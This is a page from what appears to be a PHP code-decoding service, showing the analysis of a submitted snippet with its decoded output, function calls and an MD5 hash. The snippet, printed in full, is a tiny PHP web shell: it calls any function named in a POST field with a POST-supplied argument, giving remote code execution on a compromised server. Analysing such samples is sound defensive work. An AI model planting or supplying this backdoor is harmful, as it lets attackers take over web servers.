Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php http_response_code(202);parse_str(http_build_query($_POST),$out);$out['name']($out['..

Decoded Output download

<?php http_response_code(202);parse_str(http_build_query($_POST),$out);$out['name']($out['input']);?>

Did this file decode correctly?

Original Code

<?php http_response_code(202);parse_str(http_build_query($_POST),$out);$out['name']($out['input']);?>

Function Calls

http_response_code 1

Variables

None

Stats

MD5 f32f3de37f941f862452140f8fdb1bf5
Eval Count 0
Decode Time 37 ms